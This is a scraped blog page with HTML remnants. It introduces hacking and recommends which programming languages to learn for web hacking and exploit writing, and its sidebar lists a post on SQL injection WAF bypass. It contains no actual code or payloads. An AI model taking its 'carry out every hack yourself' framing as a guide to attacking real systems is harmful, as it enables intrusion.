src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq34cKJFo1V8Fc-JvZ7mIR267O0dfMY9YNyRdqHDSbFtZtEDTTHFuqjgxqO5_c1n9zYnfCKryzXV-IJrueYZk564FJwufwv3GyI_T9kpwopQR7YDcf-WH_mHksPFpIdjSEecIlBv7g2PFl/s1600/hacking.jpg" title="" width="400" /></a></td></tr><tr><td class="tr-caption" style="font-size: 12.8px;">What Is Hacking?<br /><div><br /></div></td></tr></tbody></table><span style="font-family: Arial, Helvetica, sans-serif;"> Due to the mass attention given to the so called <b>"</b><b>Black hats</b><b>" or "Crackers"</b> from the media, the reputation of all hackers, even the good ones is damaged. This is what this website is for - To turn this image around. Hacking is always viewed as something illegal and shrewd. This is almost never the case. A few bad guys doing a few bad things has put a bad name for an entire community. This doesn't have to be so, which is why I've made this website. <br /><br /> The goal of this website is to introduce to people the true philosophy and ethics of the elusive world of Hacking, hopefully clearing their name and giving them the social status they deserve. I will show you everything there is to show in hacking. Every single hacking technique that exists, how it works and how to actually carry them out yourself. You will get to know how to protect yourself from these same hacks and eventually I hope to clear the bad name that has been given to Hackers around the globe. <br /></span><br /><span style="font-family: Arial, Helvetica, sans-serif;"> Your journey begins - Right here, Right now.</span><br /><span style="font-family: Trebuchet MS;"><span style="font-size: 11pt;"><br /></span></span><span style="font-family: Trebuchet MS;"><span style="font-size: 14.6667px;"><br /></span></span><span style="font-family: Trebuchet MS;"><span style="font-size: 14.6667px;"><b>TAGS: Learn Hacking </b></span></span><br /><span style="font-family: Trebuchet MS;"><span style="font-size: 14.6667px;"><b>what is hacking </b></span></span><br /><span style="font-family: Trebuchet MS;"><span style="font-size: 14.6667px;"><b>learning hacking online </b></span></span><br /><span style="font-family: Trebuchet MS;"><span style="font-size: 14.6667px;"><b>learn how to hack websites </b></span></span><br /><span style="font-family: Trebuchet MS;"><span style="font-size: 14.6667px;"><b>learning how to hack </b></span></span><br /><span style="font-family: Trebuchet MS;"><span style="font-size: 14.6667px;"><b>learning to hack </b></span></span><br /><span style="font-family: Trebuchet MS;"><span style="font-size: 14.6667px;"><b>learn to hack </b></span></span><br /><span style="font-family: Trebuchet MS;"><span style="font-size: 14.6667px;"><b>hacking programs </b></span></span><br /><span style="font-family: Trebuchet MS;"><span style="font-size: 14.6667px;"><b>learn how to hack </b></span></span><br /><span style="font-family: Trebuchet MS;"><span style="font-size: 14.6667px;"><b>how to hack </b></span></span><br /><span style="font-family: Trebuchet MS;"><span style="font-size: 14.6667px;"><b>hacking</b></span></span><br /><span style="font-family: Trebuchet MS;"><span style="font-size: 14.6667px;"><b>what is hacking </b></span></span><br /><span style="font-family: Trebuchet MS;"><span style="font-size: 14.6667px;"><b>hacking games </b></span></span><br /><span style="font-family: Trebuchet MS;"><span style="font-size: 14.6667px;"><b>how to be a hacker </b></span></span><br /><span style="font-family: Trebuchet MS;"><span style="font-size: 14.6667px;"><b>hacker</b></span></span><br /><span style="font-family: Trebuchet MS;"><span style="font-size: 14.6667px;"><b>hacking tools</b></span></span><br /><span style="font-family: Trebuchet MS;"><span style="font-size: 14.6667px;"><b>Become a Hacker</b></span></span><br /><span style="font-family: Trebuchet MS;"><span style="font-size: 14.6667px;"><b>how to become a hacker </b></span></span><br /><span style="font-family: Trebuchet MS;"><span style="font-size: 14.6667px;"><b>hacking for beginners </b></span></span><br /><span style="font-family: Trebuchet MS;"><span style="font-size: 14.6667px;"><b>how to be a hacker </b></span></span><br /><span style="font-family: Trebuchet MS;"><span style="font-size: 14.6667px;"><b>hacking software </b></span></span><br /><span style="font-size: 14.6667px;"><b><span style="font-family: Trebuchet MS;"></span></b></span><br /><span style="font-family: Trebuchet MS;"><span style="font-size: 14.6667px;"><b>learn to hack </b></span></span></div>

What is Hacking? In the cyber security world, the person who is able to discover a weakness in the system and manages to exploit it to accom...

View Post

Best Hacking Tutorials In 2016

No comments:

<blockquote class="td_pull_quote td_pull_center" style="background-color: white; border-left-style: none; box-sizing: border-box; clear: both; font-family: 'Titillium Web'; font-size: 18px; line-height: 26px; margin: 0px; padding: 18px 25px; position: relative;"><div style="box-sizing: border-box; font-style: italic; font-weight: 600; margin-bottom: 26px; text-align: center;"><span style="color: red;">InShort: Today I’m gonna share top and best <strong style="box-sizing: border-box;">hacking tutorials 2016</strong> which I’ve experienced in my learning hacking carrier. In Hacking filed when you ask somebody How can I become Hacker?</span></div></blockquote><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtYtpacwN26dAXaWeyRpCFw_jTmDsGbqiwiQufksrxCjDbYVyTZ84b-BDicgT_b4XwY_cI93qV5a3eSOeUaCahU5KffWv2x8VDGD3RSj2B2MncgIt9OiNRIcBqW8QK185L5hdVN9NwdcBC/s1600/result.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="Best Hacking Tutorials In 2016" border="0" height="328" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtYtpacwN26dAXaWeyRpCFw_jTmDsGbqiwiQufksrxCjDbYVyTZ84b-BDicgT_b4XwY_cI93qV5a3eSOeUaCahU5KffWv2x8VDGD3RSj2B2MncgIt9OiNRIcBqW8QK185L5hdVN9NwdcBC/s640/result.jpg" title="Best Hacking Tutorials In 2016" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Best Hacking Tutorials In 2016</td></tr></tbody></table><br /><blockquote class="td_quote_box td_box_center" style="background-color: #fcfcfc; border-color: rgb(0, 0, 0); border-left-style: solid; border-left-width: 2px; box-sizing: border-box; clear: both; font-family: 'Titillium Web'; font-size: 18px; line-height: 26px; margin: 0px 0px 29px; padding: 15px 23px 0px; position: relative; top: 6px;"><h3 style="box-sizing: border-box; font-size: 22px; font-weight: 400; line-height: 30px; margin: 27px 0px 17px;"><strong style="box-sizing: border-box;">Can I learn Hacking without Knowing Programming?</strong></h3><div style="box-sizing: border-box; font-style: italic; line-height: 21px; padding-bottom: 16px; text-align: center;">Simply you just can’t, Even if you managed to learn it step-by-step tutorial, You’ll never be able to hack or pentest on your own. Its because you don’t know the core and logic of target application, If you understand application logic you can easily play with it. So that’s why it is highly recommended to learn programming languages to become an Ethical Hacker.</div><div style="box-sizing: border-box; font-style: italic; line-height: 21px; padding-bottom: 16px; text-align: center;"><strong style="box-sizing: border-box; font-size: 22px; line-height: 30px;"><span style="color: red;">#1 To Become An Ethical Hacker</span></strong></div><div style="box-sizing: border-box; font-style: italic; line-height: 21px; padding-bottom: 16px; text-align: center;"><span style="color: red;"><b>Here are the main topics to become a Ethical Hacker,</b></span></div><div style="box-sizing: border-box; font-style: italic; line-height: 21px; padding-bottom: 16px; text-align: center;"><span style="color: red;"><b><span style="box-sizing: border-box; line-height: 26px;">Web Hacking</span><span style="line-height: 26px;"> : So if you’re interested in web hacking. You should follow below guide.</span></b></span></div><ol style="box-sizing: border-box; padding: 0px;"><li style="box-sizing: border-box; margin-left: 21px;"><strong style="box-sizing: border-box;">HTML</strong> : Hyper Text Markup Language. Always learn from basic and HTML is important and most basic markup language. One should know it very well to understand web action/reaction and logic. HTML is static markup language.</li><li style="box-sizing: border-box; margin-left: 21px;"><strong style="box-sizing: border-box;">JavaScript</strong> : JavaScript is the most used as client-side programming. You should learn it on high priority mode. Understanding JavaScript code logic can help you find web-apps flaw.</li><li style="box-sizing: border-box; margin-left: 21px;"><strong style="box-sizing: border-box;">SQL</strong> : Structured Query Language is database programming language. Each and every data is stored in database so you should know about database programming and vulnerability as it is the most sensitive part of Web.</li><li style="box-sizing: border-box; margin-left: 21px;"><strong style="box-sizing: border-box;">PHP</strong> : PHP is most popular dynamic programming language, Unlike JavaScript It is server-side programming language. PHP is strongly recommended to every beginner in Hacking and Penetration testing.</li></ol><div style="box-sizing: border-box; color: #777777; font-style: italic; line-height: 21px; padding-bottom: 16px; text-align: center;"><strong style="box-sizing: border-box; font-size: 22px; line-height: 30px;"></strong></div></blockquote><br /><blockquote class="td_quote_box td_box_center" style="background-color: #fcfcfc; border-color: rgb(0, 0, 0); border-left-style: solid; border-left-width: 2px; box-sizing: border-box; clear: both; font-family: 'Titillium Web'; font-size: 18px; line-height: 26px; margin: 0px 0px 29px; padding: 15px 23px 0px; position: relative; top: 6px;"><div style="box-sizing: border-box; font-style: italic; line-height: 21px; padding-bottom: 16px; text-align: center;"><strong style="box-sizing: border-box; font-size: 22px; line-height: 30px;"><span style="color: red;">#2 Programming Languages for Exploit Writing</span></strong></div><div style="box-sizing: border-box; font-style: italic; line-height: 21px; padding-bottom: 16px; text-align: center;">Exploit writing is difficult and advance part of Hacking, It requires higher level of programming language. Every professional hacker must know Exploit Writing, It can be done in any programming language like C, C++, Ruby, Python etc.</div><div style="box-sizing: border-box; font-style: italic; line-height: 21px; padding-bottom: 16px; text-align: center;"><strong style="box-sizing: border-box; font-family: Verdana, Geneva, sans-serif; font-size: 15px; line-height: 26px;">C</strong><span style="line-height: 26px;">: The mother of all programming language, C is most used in software creation for Linux, Windows etc… However it is also used for Exploit writing and development. I would prefer to learn C first and recommend to you as well.</span></div><ol style="box-sizing: border-box; padding: 0px;"><li style="box-sizing: border-box; margin-left: 21px;"><strong style="background-color: white; box-sizing: border-box; font-family: Verdana, Geneva, sans-serif; font-size: 15px;">Python</strong>: Python is most used language for exploit writing, It is highly recommended you to learn Python Socket Programming because it helps lot learning exploit creation.</li><li style="box-sizing: border-box; margin-left: 21px;"><strong style="background-color: white; box-sizing: border-box; font-family: Verdana, Geneva, sans-serif; font-size: 15px;">Ruby</strong>: Ruby is simple but complicated object oriented programming language. Ruby is very useful in exploit writing. Ruby is used for meterpreter scripting and do you know Metasploit Framework itself programmed in Ruby.</li></ol></blockquote>

InShort: Today I’m gonna share top and best hacking tutorials 2016 which I’ve experienced in my learning hacking carrier. In Hacking filed...

View Post

Jual DVD game HD android dan Tutorial oprek android

Jumlah Pengunjung

SQL INJECTION : BYPASSING WAF (WEB APPLICATION FIREWALL)

What Is Hacking?

Best Hacking Tutorials In 2016

Popular

Comments